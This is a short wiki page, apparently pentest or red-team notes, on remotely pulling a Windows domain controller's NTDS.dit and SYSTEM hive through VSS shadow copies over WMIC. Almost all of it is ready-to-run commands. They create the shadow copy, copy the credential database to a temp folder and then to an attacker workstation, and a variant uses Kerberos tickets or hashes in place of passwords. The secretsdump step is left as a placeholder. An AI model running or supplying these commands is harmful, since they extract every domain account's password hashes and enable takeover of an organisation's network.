(Created page with "asd") |
No edit summary |
||
| Line 1: | Line 1: | ||
== Pulling the ntds.dit remotely using VSS shadow copy (over WMI or PowerShell Remoting) == | |||
Leverage WMIC (or PowerShell remoting) to Create (or copy existing) VSS.<syntaxhighlight lang="powershell"> | |||
# Take a snapshot of the VSS. | |||
wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c vssadmin create shadow /for=c: 2>&1 > c:\vss.log" | |||
# Once the VSS snapshot has been completed, copy the NTDS.dit file and the System Registry Hive to the C: drive on the DC. | |||
1. wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\temp\NTDS.dit 2>&1 > C:\vss2.log" | |||
2. wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\temp\SYSTEM.hive 2>&1 > C:\vss2.log" | |||
# Copy the below files from the C:\temp directory on the DC to the local workstation | |||
PS C:\Windows\system32> copy \\Tech-DC\c$\windows\temp\ntds.dit c:\temp | |||
PS C:\Windows\system32> copy \\Tech-DC\c$\windows\temp\system.hive c:\temp | |||
insert impacket-secretsdump command here | |||
</syntaxhighlight>Use hash instead of clear text credentials. Note: This will require creating a new session with an imported ticket with the user's hash.<syntaxhighlight lang="powershell"> | |||
# Replace the commands from above with these commands. | |||
/user:DOMAIN\someuser -> /authority:"kerberos:DOMAIN\someuser" | |||
</syntaxhighlight> | |||
Latest revision as of 12:57, 19 September 2023
Pulling the ntds.dit remotely using VSS shadow copy (over WMI or PowerShell Remoting)
Leverage WMIC (or PowerShell remoting) to Create (or copy existing) VSS.
# Take a snapshot of the VSS.
wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c vssadmin create shadow /for=c: 2>&1 > c:\vss.log"
# Once the VSS snapshot has been completed, copy the NTDS.dit file and the System Registry Hive to the C: drive on the DC.
1. wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\temp\NTDS.dit 2>&1 > C:\vss2.log"
2. wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\temp\SYSTEM.hive 2>&1 > C:\vss2.log"
# Copy the below files from the C:\temp directory on the DC to the local workstation
PS C:\Windows\system32> copy \\Tech-DC\c$\windows\temp\ntds.dit c:\temp
PS C:\Windows\system32> copy \\Tech-DC\c$\windows\temp\system.hive c:\temp
insert impacket-secretsdump command here
Use hash instead of clear text credentials. Note: This will require creating a new session with an imported ticket with the user's hash.
# Replace the commands from above with these commands.
/user:DOMAIN\someuser -> /authority:"kerberos:DOMAIN\someuser"